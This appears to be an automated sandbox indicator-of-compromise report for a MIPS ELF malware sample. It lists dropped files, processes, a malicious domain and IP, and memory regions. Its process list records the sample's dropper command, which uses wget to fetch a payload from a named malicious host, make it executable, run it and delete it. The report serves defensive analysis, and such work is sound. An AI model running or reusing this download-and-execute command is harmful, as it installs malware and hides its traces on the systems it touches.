IOC Report
mips.elf

loading gif

Files

File Path
Type
Category
Malicious
mips.elf
ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
initial sample
malicious
/tmp/qemu-open.8vpvW7 (deleted)
ASCII text
dropped

Processes

Path
Cmdline
Malicious
/tmp/mips.elf
/tmp/mips.elf
/tmp/mips.elf
-
/bin/sh
/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."
/bin/sh
-
/usr/bin/wget
wget -q http://gay.energy/.../vivid -O .....
/bin/sh
-
/usr/bin/chmod
chmod 777 .....
/bin/sh
-
/bin/sh
/bin/sh ./.....
/bin/sh
-
/usr/bin/rm
rm -rf .....
/tmp/mips.elf
-
/tmp/mips.elf
-
/tmp/mips.elf
-
There are 4 hidden processes, click here to show them.

Domains

Name
IP
Malicious
gay.energy
unknown
malicious
daisy.ubuntu.com
162.213.35.25

IPs

IP
Domain
Country
Malicious
92.60.77.69
unknown
Italy
malicious

Memdumps

Base Address
Regiontype
Protect
Malicious
7fed08421000
page execute read
malicious
7fed08421000
page execute read
malicious
7fed08421000
page execute read
malicious
7fed912a9000
page read and write
560863455000
page read and write
7fed905c7000
page read and write
560860e01000
page read and write
7fed912ee000
page read and write
7fed90c49000
page read and write
7fed88021000
page read and write
560862e20000
page read and write
7fed91178000
page read and write
7fed912a9000
page read and write
7ffca376e000
page execute read
7fed8fdbf000
page read and write
7fed905d5000
page read and write
560860e0b000
page read and write
7fed912a1000
page read and write
560863455000
page read and write
560862e20000
page read and write
7ffca376e000
page execute read
7fed88000000
page read and write
7ffca3742000
page read and write
7fed88000000
page read and write
560860b79000
page execute read
560860b79000
page execute read
560860e0b000
page read and write
7fed08461000
page read and write
7fed08461000
page read and write
7ffca3742000
page read and write
7fed905c7000
page read and write
560860e0b000
page read and write
7fed08469000
page read and write
7fed90c26000
page read and write
7fed912ee000
page read and write
7fed88021000
page read and write
7fed91178000
page read and write
7fed90f97000
page read and write
7fed90885000
page read and write
560862e20000
page read and write
7fed905c7000
page read and write
7fed08461000
page read and write
7fed912ee000
page read and write
7fed912a1000
page read and write
7fed90c66000
page read and write
7fed88021000
page read and write
7fed90c26000
page read and write
7ffca3742000
page read and write
7fed912a9000
page read and write
7ffca376e000
page execute read
7fed88000000
page read and write
7fed8fdbf000
page read and write
7fed90c49000
page read and write
7fed90f97000
page read and write
7fed90885000
page read and write
560862e09000
page execute and read and write
7fed90c66000
page read and write
560862e09000
page execute and read and write
560862e09000
page execute and read and write
7fed912a1000
page read and write
560860e01000
page read and write
7fed905d5000
page read and write
7fed90c26000
page read and write
7fed8fdbf000
page read and write
560860e01000
page read and write
7fed90c49000
page read and write
7fed90f97000
page read and write
7fed90885000
page read and write
7fed08469000
page read and write
7fed90c66000
page read and write
7fed91178000
page read and write
7fed08469000
page read and write
7fed905d5000
page read and write
560863455000
page read and write
560860b79000
page execute read
There are 65 hidden memdumps, click here to show them.